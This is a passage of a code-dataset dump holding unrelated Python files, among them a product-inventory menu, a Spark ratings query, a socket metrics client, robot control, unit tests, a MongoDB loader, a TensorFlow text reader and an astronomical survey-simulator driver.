''')\n print(self.validar.print_table(prod, ['ID', 'nombres_producto','stock','precio','categoria_identificador','categoria']))\n input('Presiona una tecla para continuar...')\n \n except Exception as e:\n print(f'{str(e)}')\n \n def search_producto(self):\n try:\n print('''\n =====================\n BUSCAR PRODUCTO\n =====================\n ''')\n Nombre_Producto = self.validar.valiar_ingreso_texto(\"Ingrese el nombre del producto a buscar\")\n producto_buscado=self.validar.validar_existencia_campo_valor_producto('nombres_producto',Nombre_Producto)\n if producto_buscado:\n print('''\n =========================\n Producto Encontrado\n =========================\n ''')\n print(self.validar.print_table(producto_buscado, ['ID', 'nombres_producto','stock','precio','categoria_identificador','categoria']))\n if self.validar.question('¿Deseas dar mantenimiento al producto?'):\n opciones = ['Editar', 'Eliminar', 'Salir']\n respuesta = Menu(opciones).show()\n print(respuesta)\n if respuesta == 1:\n self.update_producto(producto_buscado[\"_id\"])\n elif respuesta == 2:\n self.delete_producto(producto_buscado[\"_id\"])\n \n else:\n print(\"No existe ninguna categoria ingresada con ese nombre\")\n except Exception as e:\n print(f'{str(e)}')\n\n\n def delete_producto(self,id_producto):\n print('''\n ======================\n ELIMINAR PRODUCTO\n ======================\n ''')\n data = {\n '_id': id_producto,\n }\n self.productos.delete_producto(data) \n input('Presiona una tecla para continuar...')\n\n\n def update_producto(self,id_producto):\n print('''\n =========================\n ACTUALIZAR PRODUCTO\n =========================\n ''')\n cambio = {}\n if self.validar.question('¿Deseas cambiar el nombre del producto?'):\n while True:\n Nombre_producto = self.validar.valiar_ingreso_texto(\"Ingrese el nombre del producto\")\n if self.validar.validar_existencia_campo_valor_producto('nombres_producto',Nombre_producto):\n print('El producto ingresado ya existe, ingrese otro producto')\n else:\n cambio['nombres_producto']=Nombre_producto\n break\n if 
self.validar.question('¿Deseas cambiar la categoria del producto?'):\n while True:\n nombre_categoria = self.validar.valiar_ingreso_texto(\"Ingrese la categoria del producto\")\n if self.validar.validar_existencia_campo_valor_categoria('nombres_categoria',nombre_categoria):\n cambio['categoria_identificador']=self.validar.validar_existencia_campo_valor_categoria('nombres_categoria',nombre_categoria)['_id']\n cambio['categoria']=nombre_categoria\n break\n else:\n print('La categoria ingresada no existe')\n if self.validar.question('¿Deseas actualizar el stock del producto?'):\n stock= self.validar.valiar_ingreso_integer(\"Ingrese el stock del producto\")\n cambio['stock']=stock\n if self.validar.question('¿Deseas actualizar el precio del producto?'):\n precio = self.validar.valiar_ingreso_double(\"Ingrese el precio del producto\")\n cambio['precio']=precio\n \n condicion = {\n '_id': id_producto\n }\n self.productos.update_producto(condicion,cambio)\n \n print('''\n =========================\n Producto Actualizado\n =========================\n ''')\n\n\n","sub_path":"BControllers/Producto.py","file_name":"Producto.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600718006","text":"from pyspark.sql import SparkSession\n\ndef map_ratings(x):\n x = x.split(',')\n return (x[0], (float(x[2]), 1)) \n\nspark = SparkSession.builder.appName(\"Q2RDD\").getOrCreate()\nsc = spark.sparkContext\n\n# map(user_id, (rating, counter_for_all_ratings_of_a_user=1))\n# reduceByKey (user_id, (sum_of_ratings, counter_of_ratings))\n# map(user_id, (avg_rating_in_all_movies))\nrdd = sc.textFile(\"hdfs://master:9000/movies/ratings.csv\") \\\n .map(lambda x: map_ratings(x)) \\\n .reduceByKey(lambda x, y: (x[0]+y[0], x[1]+y[1])) \\\n .map(lambda x: (x[0], x[1][0]/x[1][1]))\n\ntotal_users = rdd.count()\nusers = rdd.filter(lambda x: True if(x[1] > 3.0) else False).count()\nper = users*100/total_users\n\nprint(\"-------------------------------------------------------------\")\nprint(\"Query 2 - RDD API Output\")\nprint(\"Percentage = \", per, \"%\")\nprint(\"-------------------------------------------------------------\")\n","sub_path":"code/1/rdd/q2_rdd.py","file_name":"q2_rdd.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229371742","text":"import socket\nimport time\n\n\nclass ClientError(OSError):\n pass\n\n\nclass Client:\n def __init__(self, host, port, timeout=None):\n self.host = str(host)\n self.port = int(port)\n self.timeout = float(timeout)\n\n def parse_server_response(resp, who_call=None):\n if who_call == \"put\":\n if resp == \"ok\\n\\n\":\n return True, \"Metric has sent successfully\"\n elif resp == \"error\\nwrong command\\n\\n\":\n return False, \"Server response: wrong command\"\n else:\n return False, \"Server hasn't confirmed receiving data\"\n elif who_call == \"get\":\n if resp == \"ok\\n\\n\":\n return True, {}\n elif resp[0:2] == \"ok\" and resp[-2:] == \"\\n\\n\":\n metric_dict = {}\n resp = resp.split(\"\\n\")[1:-2]\n for metric in resp:\n metric = metric.split()\n if metric[0] in metric_dict:\n metric_dict[metric[0]].append((int(metric[2]),\n float(metric[1])))\n else:\n metric_dict[metric[0]] = [(int(metric[2]), float(metric[1]))]\n for key in metric_dict:\n metric_dict[key].sort()\n return True, metric_dict\n else:\n return False, \"Server's response is not described\"\n\n def 
handle_connect(self, message, who_call=None):\n with socket.create_connection((self.host, self.port), self.timeout) as sock:\n try:\n sock.sendall(message.encode(\"utf-8\"))\n response = sock.recv(4096)\n resp = Client.parse_server_response(response.decode(\"utf-8\"), who_call)\n return resp\n except socket.timeout:\n return False, \"Client send data timeout\"\n except socket.error:\n return False, \"Client send data error\"\n\n def put(self, server_dot_metric, metric_value, timestamp=None):\n if not timestamp:\n timestamp = int(time.time())\n message = \"put {} {} {}\\n\".format(server_dot_metric, metric_value, timestamp)\n resp = self.handle_connect(message, who_call=\"put\")\n if not resp[0]:\n print(resp[1])\n raise ClientError\n else:\n print(resp[1])\n\n def get(self, metric):\n message = \"get {}\\n\".format(metric)\n resp = self.handle_connect(message, who_call=\"get\")\n if resp[0]:\n return resp[1]\n else:\n print(resp[1])\n raise ClientError\n\n\ndef main(host, port, timeout):\n client = Client(host, port, timeout)\n client.put(\"palm.cpu\", 0.5, timestamp=1150864247)\n client.put(\"palm.cpu\", 2.0, timestamp=1150864248)\n client.put(\"palm.cpu\", 0.5, timestamp=1150864248)\n client.put(\"eardrum.cpu\", 3, timestamp=1150864250)\n client.put(\"eardrum.cpu\", 4, timestamp=1150864251)\n client.put(\"eardrum.memory\", 4200000)\n print(client.get(\"palm.cpu\"))\n print(client.get(\"eardrum.memory\"))\n print(client.get(\"*\"))\n for i in range(0, 10):\n time.sleep(1)\n print(client.get(\"eardrum.memory\"))\n print(\"Client session is closed\")\n\nif __name__ == \"__main__\":\n host = \"localhost\"\n port = 8888\n timeout = 5\n main(host, port, timeout)\n","sub_path":"week_5/parse_mes.py","file_name":"parse_mes.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"478902764","text":"\"\"\" Issue warnings for towns that have stations reading relative water levels\n that indicate possibility for a flood\n\"\"\"\n\nfrom floodsystem.stationdata import build_station_list, update_water_levels\nfrom floodsystem.flood import stations_level_over_threshold\nfrom floodsystem.analysis import flood_warn\nimport operator\n\ndef run():\n\n # Build stations\n stations = build_station_list()\n\n # Update station data\n update_water_levels(stations)\n\n stat_over_thresh = stations_level_over_threshold(stations,1.3)\n\n just_stat_over_thresh = [i[0] for i in stat_over_thresh]\n\n warning_stations = flood_warn(just_stat_over_thresh)\n\n towns_with_warnings = {}\n\n warning_strings = ('No Warning','Low Risk','Moderate Risk',\\\n 'High Risk','Severe Risk')\n\n for station in warning_stations:\n if station.town in towns_with_warnings:\n if station.warning_level > towns_with_warnings[station.town]:\n towns_with_warnings[station.town]=station.warning_level\n else:\n towns_with_warnings[station.town]=station.warning_level\n\n to_del = []\n for town in towns_with_warnings:\n if towns_with_warnings[town]==None or town == None:\n to_del.append(town)\n\n for town in to_del:\n del towns_with_warnings[town]\n\n\n s_towns_with_warnings = sorted(towns_with_warnings.items(),\\\n key=operator.itemgetter(1),reverse=True)\n\n for town in s_towns_with_warnings:\n if town[1] == None:\n continue\n print(\"Town name:\",town[0])\n print(\"Warning level:\",warning_strings[town[1]])\n 
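# towns are printed in descending warning order; a blank line separates entries\n 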
print(\"\")\n\n\nrun()\n","sub_path":"issue_warnings.py","file_name":"issue_warnings.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"415831120","text":"\n\nfrom xai.brain.wordbase.verbs._scamper import _SCAMPER\n\n#calss header\nclass _SCAMPERED(_SCAMPER, ):\n\tdef __init__(self,): \n\t\t_SCAMPER.__init__(self)\n\t\tself.name = \"SCAMPERED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"scamper\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_scampered.py","file_name":"_scampered.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"3731416","text":"#!/usr/bin/env python3\n#If you use the infrared sensor in place of the ultrasound sensor then you must modify the code since these sensors use different commands to obtain the sensor reading and since the infrared sensor returns a value that is neither in cm nor in mm. To convert an IR value into a very approximate distance in cm, multiply the IR value by 0.7. For example, if the IR value is 100 then the distance is roughly 70 cm. That means 11 cm corresponds to 16 'IR units' and 5 cm corresponds to 7 'IR units'. Here is the same program, modified for the IR sensor. Changed lines are highlighted.\nfrom ev3dev.ev3 import *\nfrom time import sleep\n\n# Connect infrared sensor to any sensor port\n# and check it is connected.\nir = InfraredSensor() \nassert ir.connected, \"Connect an IR sensor to any sensor port\"\n\n# Put the infrared sensor into proximity mode.\nir.mode = 'IR-PROX'\n\n# Attach large motors to ports B and C\nmB = LargeMotor('outB')\nmC = LargeMotor('outC')\n\n# Record the initial separation of the sensor and the object\nstartdistance = ir.value()\n\n# Advance at 50% speed (speed_sp=450)\nmB.run_forever(speed_sp=-450)\nmC.run_forever(speed_sp=-450)\n\n# Wait until robot has moved (at least) 11 cm closer\n# to the reflecting object in front of it\nwhile ir.value() > 16: # 16 IR units = 11cm approx\n sleep(0.01)\n \n# Turn off the motors and apply the brake\nmB.stop(stop_action=\"brake\")\nmC.stop(stop_action=\"brake\")\nsleep(1)\n\n#turn right\nmB.run_to_rel_pos(position_sp=300, speed_sp=360, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-300, speed_sp=360, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#go straight for 6 inches in degrees\nmB.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#turn left\nmB.run_to_rel_pos(position_sp=-300, speed_sp=360, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=300, speed_sp=360, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#go straight for 6 inches in degrees\nmB.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#turn left\nmB.run_to_rel_pos(position_sp=-300, speed_sp=360, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=300, speed_sp=360, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#go straight for 6 inches in degrees\nmB.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-600, speed_sp=450, 
stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#turn right\nmB.run_to_rel_pos(position_sp=300, speed_sp=360, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-300, speed_sp=360, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#go straight for 6 inches in degrees\nmB.run_to_rel_pos(position_sp=-1600, speed_sp=450, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-1600, speed_sp=450, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running') \n\nmB.stop()\nmC.stop()\n","sub_path":"avoid.py","file_name":"avoid.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"479245641","text":"# pylint: disable=protected-access, unused-argument\n# pylint: disable=no-value-for-parameter\n\nfrom unittest import TestCase, mock\n\nimport radical.entk.exceptions as ree\n\nfrom radical.entk.execman.rp import ResourceManager as RPRmgr\n\n\nstage_ins = []\n\n\ndef _pilot_stage_in(sds):\n stage_ins.append(sds)\n\n\ndef _submit_pilot_side_effect(*args):\n mocked_Pilot = mock.MagicMock()\n mocked_Pilot.wait = mock.MagicMock(return_value='hello_from_pilot')\n mocked_Pilot.stage_in = _pilot_stage_in\n return mocked_Pilot\n\n\nclass TestBase(TestCase):\n\n\n # ------------------------------------------------------------------------------\n #\n @mock.patch('radical.utils.generate_id', return_value='rmgr.0000')\n @mock.patch('os.getcwd', return_value='test_folder')\n @mock.patch('radical.utils.Logger')\n @mock.patch('radical.utils.Profiler')\n def test_init(self, mocked_generate_id, mocked_getcwd, mocked_Logger,\n mocked_Profiler):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n self.assertIsNone(rmgr._session)\n self.assertIsNone(rmgr._pmgr)\n self.assertIsNone(rmgr._pilot)\n self.assertFalse(rmgr._download_rp_profile)\n\n with self.assertRaises(ree.ValueError):\n RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox'})\n\n with self.assertRaises(ree.ValueError):\n RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000', rts_config={\"db_cleanup\": False})\n\n # --------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_session(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n rmgr._session = 'test_session'\n self.assertEqual(rmgr.session, 'test_session')\n\n\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_pmgr(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n rmgr._pmgr = 'test_pmgr'\n self.assertEqual(rmgr.pmgr, 'test_pmgr')\n\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_pilot(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n rmgr._pilot = 'test_pilot'\n self.assertEqual(rmgr.pilot, 'test_pilot')\n\n\n # --------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def 
test_get_resource_allocation_state(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n rmgr._pilot = mock.Mock()\n rmgr._pilot.state = 'test_state'\n state = rmgr.get_resource_allocation_state()\n self.assertEqual(state, 'test_state')\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n with self.assertRaises(AttributeError):\n state = rmgr.get_resource_allocation_state()\n\n\n # --------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_get_completed_states(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n\n state = rmgr.get_completed_states()\n\n self.assertEqual(state, ['DONE', 'FAILED', 'CANCELED'])\n\n\n # ------------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n @mock.patch('radical.utils.Logger')\n @mock.patch('radical.utils.Profiler')\n @mock.patch('radical.pilot.Session', return_value='test_session')\n @mock.patch('radical.pilot.PilotDescription', return_value='pilot_desc')\n @mock.patch('radical.pilot.PilotManager', return_value=mock.MagicMock(wait=mock.MagicMock(return_value=True),\n submit_pilots=_submit_pilot_side_effect,\n register_callback=mock.MagicMock(return_value=True)))\n def test_submit_resource_request(self, mocked_init, mocked_Logger,\n mocked_Profiler, mocked_Session,\n mocked_PilotDescription,\n mocked_PilotManager):\n\n rmgr = RPRmgr()\n rmgr._logger = mocked_Logger\n rmgr._prof = mocked_Profiler\n rmgr._uid = 'rmgr.0000'\n rmgr._sid = 'rmgr.0000'\n rmgr._rts_config = {'sandbox_cleanup': False}\n rmgr._resource = 'test_resource'\n rmgr._walltime = 30\n rmgr._cpus = 1\n rmgr._project = 'test_project'\n rmgr._gpus = 1\n rmgr._access_schema = 'test_access'\n rmgr._queue = 'test_queue'\n rmgr._shared_data = 'test_data'\n rmgr._outputs = 'test_outputs'\n rmgr._job_name = None\n rmgr._shared_data = ['test/file1.txt > file1.txt', 'file2.txt']\n\n rmgr.submit_resource_request()\n self.assertEqual(rmgr._session, 'test_session')\n self.assertEqual(stage_ins[0], [{'action': 'Transfer',\n 'source': 'test/file1.txt',\n 'target': 'file1.txt'},\n {'action': 'Transfer',\n 'source': 'file2.txt',\n 'target': 'file2.txt'}\n ])\n\n\n # ------------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n @mock.patch('radical.utils.Logger')\n @mock.patch('radical.utils.Profiler')\n def test_get_rts_info(self, mocked_init, mocked_Logger,\n mocked_Profiler):\n rmgr = RPRmgr()\n rmgr._logger = mocked_Logger\n rmgr._prof = mocked_Profiler\n rmgr._pilot = mock.Mock()\n rmgr._pilot.as_dict = mock.MagicMock(return_value={'pilot': 'pilot.0000'})\n\n self.assertEqual(rmgr.get_rts_info(), {'pilot': 'pilot.0000'})\n","sub_path":"tests/test_component/test_rmgr_rp.py","file_name":"test_rmgr_rp.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148098119","text":"# Adapted from: https://lincolnloop.com/blog/2008/mar/25/serving-django-cherrypy/.\n\nimport os\nfrom django.core.management.base import 
BaseCommand\n\nfrom bmds_server.wsgi import application\nfrom cherrypy import wsgiserver\n\n\nHELP_TEXT = \"\"\"Serve application using CherryPy WSGI server.\"\"\"\n\n\nclass Command(BaseCommand):\n\n help = HELP_TEXT\n\n def handle(self, *args, **options):\n\n # Added to environment by IIS\n port = int(os.environ.get('HTTP_PLATFORM_PORT', 8000))\n\n server = wsgiserver.CherryPyWSGIServer(\n ('0.0.0.0', port),\n application\n )\n\n server.start()\n","sub_path":"jobrunner/management/commands/run_cherrypy_server.py","file_name":"run_cherrypy_server.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"265151428","text":"'''\nWrapper for inserting a JSON file into MongoDB using pymongo\n'''\nfrom pymongo import MongoClient\nimport json\nclass JsonToMongo(object):\n # Initialize the database connection\n def __init__(self, host, port, dbName, collectionName, filename):\n # Create the MongoDB client\n self.client = MongoClient(host, port)\n # Create or connect to the database\n self.db = self.client.get_database(dbName)\n # Create or use the collection\n self.collection = self.db.get_collection(collectionName)\n self.filename = filename\n # Read the json file\n def open_json(self):\n self.file = open(self.filename, 'r')\n # Close the file\n def close_file(self):\n self.file.close()\n # Query method\n def query(self, command):\n result = self.collection.find(command)\n return result\n # Write to the database\n def insert_mongo(self):\n self.open_json()\n # Load the json file\n data = json.load(self.file)\n\n try:\n self.collection.insert(data)\n print('Successfully wrote %s!' % self.filename)\n except Exception as e:\n print(e)\n finally:\n self.close_file()\n \nif __name__ == '__main__':\n j2m = JsonToMongo('localhost', 27017, 'test_db', 'test_collection', 'gkgSppProcessData.json')\n j2m.insert_mongo()\n","sub_path":"HCC/json2mongo.py","file_name":"json2mongo.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"192969216","text":"#coding:utf-8\n\n# Copyright 2015 The TensorFlow Authors. 
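# Side note on json2mongo.py above: Collection.insert() is deprecated in
# PyMongo 3+. A minimal sketch of the same load step with the modern API
# (same host, database, collection and file names as above):
import json
from pymongo import MongoClient

client = MongoClient('localhost', 27017)
collection = client.get_database('test_db').get_collection('test_collection')
with open('gkgSppProcessData.json', 'r') as f:
    data = json.load(f)
if isinstance(data, list):
    collection.insert_many(data)  # a JSON array becomes many documents
else:
    collection.insert_one(data)   # a single JSON object becomes one document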
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\n\"\"\"Utilities for parsing text files.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\ndef _testread_words(filename):\n lines=[]\n docid=[]\n for line in open(filename,'r'):\n if len(line)>20:\n lines.append(' '.join(line.split(' ')[1:-1]))\n docid.append(line.split(' ')[0])\n return ' '.join(lines).split(),docid\n\n\ndef _read_words(filename):\n lines=[]\n for line in open(filename,'r'):\n lines.append( line.strip())\n return ' '.join(lines).split()\n\ndef _build_vocab(filename):\n data = _read_words(filename)\n counter = collections.Counter(data)\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n out = open('vocab','w')\n for key in word_to_id:\n out.write(key)\n out.write(' ')\n out.write(str(word_to_id[key]))\n out.write('\\n')\n \n out.close() \n return word_to_id\n\n\ndef _testfile_to_word_ids(filename, word_to_id):\n data ,docid = _testread_words(filename)\n file2id = []\n for word in data:\n if word_to_id.has_key(word):\n file2id.append(word_to_id[word])\n# return [word_to_id[word] for word in data]\n return file2id, docid\n\n\ndef _file_to_word_ids(filename, word_to_id):\n data = _read_words(filename)\n file2id = []\n for word in data:\n if word_to_id.has_key(word):\n file2id.append(word_to_id[word])\n# return [word_to_id[word] for word in data]\n return file2id\n\ndef ptb_raw_data(data_path=None):\n \"\"\"\n Args:\n data_path: string path to the directory where simple-examples.tgz has\n been extracted.\n\n Returns:\n tuple (train_data, vocabulary)\n where each of the data objects can be passed to PTBIterator.\n \"\"\"\n\n train_path = os.path.join(data_path, \"tmp_hcxw_pre.txt\")\n\n\n word_to_id = _build_vocab(train_path)\n train_data = _file_to_word_ids(train_path, word_to_id)\n vocabulary = len(word_to_id)\n return train_data, word_to_id\n\n\ndef ptb_iterator(raw_data, batch_size, num_steps):\n \"\"\"\n Args:\n raw_data: one of the raw data outputs from ptb_raw_data.\n batch_size: int, the batch size.\n num_steps: int, the number of unrolls.\n\n Yields:\n Pairs of the batched data, each a matrix of shape [batch_size, num_steps].\n The second element of the tuple is the same data time-shifted to the\n right by one.\n\n Raises:\n ValueError: if batch_size or num_steps are too high.\n \"\"\"\n raw_data = np.array(raw_data, dtype=np.int32)\n data_len = len(raw_data)\n batch_len = data_len // batch_size\n\n data = np.zeros([batch_size, batch_len], dtype=np.int32)\n for i in range(batch_size):\n # slide a fixed window of size batch_len over the data\n data[i] = raw_data[batch_len * i:batch_len * (i + 1)]\n\n # how many sequences fit in one batch\n # num_steps is the length of each individual sequence\n epoch_size = (batch_len - 1) // num_steps\n\n if 
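# Worked example of the batching arithmetic above: with len(raw_data) = 10 and
# batch_size = 2, batch_len = 10 // 2 = 5, so data = [[0,1,2,3,4], [5,6,7,8,9]]
# for raw_data = range(10). With num_steps = 2, epoch_size = (5 - 1) // 2 = 2,
# and the iterator yields two (x, y) pairs of shape (2, 2), y shifted one step
# to the right of x: first x = [[0,1],[5,6]], first y = [[1,2],[6,7]].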
epoch_size == 0:\n raise ValueError(\"epoch_size == 0, decrease batch_size or num_steps\")\n\n for i in range(epoch_size):\n x = data[:, i*num_steps:(i+1)*num_steps]\n y = data[:, i*num_steps+1:(i+1)*num_steps+1]\n yield (x, y)\n\n\ndef ptb_iterator_test(datapath):\n \n test_path = os.path.join(datapath, \"tmp_cc_4w_bw_h2_pre\")\n word_to_id=dict()\n for line in open('vocab','r'):\n key = line.split(' ')[1].strip('\\n')\n value = line.split(' ')[0]\n word_to_id[value]=int(key)\n\n data,dataid = _testfile_to_word_ids(test_path, word_to_id)\n cnt = 0 \n data_p=[]\n for j in range(len(data)):\n if word_to_id[''] == data[j]:\n yield (dataid[cnt],data_p)\n data_p=[]\n cnt += 1\n else:\n data_p.append(data[j])\n\ndef addition_info(vocabname, additionname):\n char2info = dict()\n for line in open(additionname,'r'):\n l = len(line.split(' '))\n key = [k.strip('\\n') for k in line.split(' ')[1:l]]\n #key = line.split(' ')[1:l]\n value = line.split(' ')[0].strip()\n char2info[value]=key\n addition_info = dict()\n for line in open(vocabname, 'r'):\n key = int(line.split(' ')[1].strip('\\n'))\n value = line.split(' ')[0].strip()\n if char2info.has_key(value):\n addition_info[key] = char2info[value]\n else:\n addition_info[key] = ['-0.001','-0.001']\n #counter = collections.Counter(addition_info)\n #count_pairs = sorted(counter.items(), key = lambda x:(x[1], x[0]))\n #keys, values = list(zip(*count_pairs))\n #return map(list, zip(*[values]))\n return [addition_info[k] for k in sorted(addition_info.keys())]\n\n\n","sub_path":"RNN/tensorflow_reader.py","file_name":"tensorflow_reader.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"461895389","text":"#! /usr/bin/env python\n\nimport sys\nfrom random import random, gauss\nimport numpy as np\nimport math\n\n\nimport SurveySubs\nimport ssimTools as ss\nimport GiMeObj as go\n\ndrad = np.pi/180.0\n\n\n\n# Read in driver arguments\nwith open ('input.file','r') as f:\n tmp = f.read().split()\n distri_file = tmp[1] # Name of model file for GiMeObj \n fsize = tmp[0] # Number of rows in file\n\nwith open('seeds.txt','r') as f:\n seed = int(f.read()) # Seed for random number generator\n\nwith open('number_to_track.txt','r') as f:\n n_track_max = int(f.readline()) # Number of objects to track\n\nwith open('number_to_detect.txt','r') as f:\n n_detect_max = int(f.readline()) # Number of objects to track \n\nwith open ('surveydir.txt','r') as f:\n survey_dir = f.read().split()[0] # Path to directory containing the characterization files\n\ndetect_file = 'detections.dat' # Output file for detections\ntrack_file = 'tracked.dat' # Output file for tracked objects\n\ngo.setRand(seed)\nss.setRand(seed)\n\nf_detect = ss.detFile(detect_file, seed) # set-up the detection file comments in OSSOS format\nf_track = ss.trackFile(track_file) # set-up the tracked file comments in OSSOS format\n\n\ndrawn = open('drawn.dat','w') # the first 5000 objects drawn\n\ndrawn.write('# a\\t\\te\\t\\tinc\\t\\tnode\\t\\tperi\\t\\tManom\\t\\tH\\t\\tresamp \\n')\n\nkeep_going = True\nn_iter, n_hits, n_track = 0, 0, 0\n\n#n_track_max=2\n\n# I believe this is envisioned as a comment for the kind of object returned by GiMeObj\ncomments = 'res'\n\nwhile keep_going:\n\n # Draw an object \n a,e,inc,node,peri,M,epoch,h,color,gb,ph,period,amp,resamp = go.GiMeObj(distri_file)\n\n # Write out the first 5000 objects to a file to give a small representative sample\n if n_iter <5000:\n 
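# ptb_iterator_test above splits one flat stream of word ids back into
# per-document sequences at a sentinel id (word_to_id['']). The same split in
# isolation (illustrative helper):
def split_on_sentinel(ids, sentinel):
    docs, doc = [], []
    for tok in ids:
        if tok == sentinel:
            docs.append(doc)
            doc = []
        else:
            doc.append(tok)
    return docs

assert split_on_sentinel([1, 2, 0, 3, 0], sentinel=0) == [[1, 2], [3]]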
drawn.write(str(a)+'\\t'+str(e)+'\\t'+str(inc/drad)+'\\t'+str(node/drad)+'\\t'+str(peri/drad)+'\\t'+str(M/drad)+'\\t'+str(h)+'\\t'+str(resamp)+'\\n')\n\n # Counter: advantage of Python over Fortran: integers can be of any value\n # There is no limit at 2**31-1.\n n_iter += 1\n\n # Call the survey simulator\n # The output seed2 is never used, but is returned by Fortran so it is stored\n seed2,flag,ra,dec,d_ra,d_dec,r,delta,m_int,m_rand,eff,isur,mt,epochp,ic,surna,h_rand = SurveySubs.detos1(a,e,inc,node,peri,M,epoch,h,color,gb,ph,period,amp,survey_dir,seed)\n\n # Condition for CFEPS objects with d<20\n if (flag > 0) and ((surna[0]=='L') or (surna[0]=='p')) and (r<20):\n continue\n\n\n # If an object is detected, flag > 0\n if flag > 0:\n n_hits += 1\n # Write the detected object out to the detections file in the OSSOS format\n ss.detWrite(detect_file, a, e, inc, node, peri, M, resamp, r, mt, m_rand, h_rand, color, ic, flag, delta, m_int, h, eff, ra, dec, d_ra, d_dec, surna, comments)\n # If an object is also tracked\n if (flag > 2) and (np.mod(flag,2) == 0):\n n_track += 1\n # Write the detected object out to the tracked file in the OSSOS format\n ss.trackWrite(track_file, a, e, inc, node, peri, M, resamp, r, mt, m_rand, h_rand, color, ic, comments)\n\n\n # Break once the maximum number of detections is reached 